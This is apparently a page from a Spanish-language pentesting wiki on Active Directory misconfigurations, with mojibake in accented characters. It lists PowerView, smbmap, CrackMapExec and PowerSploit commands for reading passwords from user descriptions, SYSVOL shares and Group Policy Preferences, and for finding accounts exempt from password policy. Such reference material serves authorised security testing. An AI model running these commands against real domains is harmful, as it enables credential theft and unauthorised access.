Configuraciones incorrectas

Informaci贸n confidencial

Campo descripci贸n de los usuarios

# PowerView
Get-DomainUser * | Select-Object SamAccountName, Description | Where-Object {$_.Description -ne $null}
Find-UserField -SearchField Description -SearchTerm "<search-pattern>"

Recursos compartidos y scripts en SYSVOL

smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password>
smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password> -R "SYSVOL"

Group Policy Preferences (GPP)

CrackMapExec

crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_password
crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_autologin

PowerSploit

# Get-GPPPassword.ps1
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

# Get-GPPAutologon.ps1
Import-Module .\Get-GPPAutologon.ps1
Get-GPPAutologon
Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

PASSWD_NOTREQD

El usuario no est谩 sujeto a la pol铆tica de contrase帽as, lo que significa que podr铆a tener una contrase帽a m谩s corta o ninguna contrase帽a (si se permiten contrase帽as vac铆as en el dominio).

# PowerView
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object SamAccountName, UserAccountControl
AnteriorPass the Ticket (PtT)SiguienteCredential dumping

脷ltima actualizaci贸n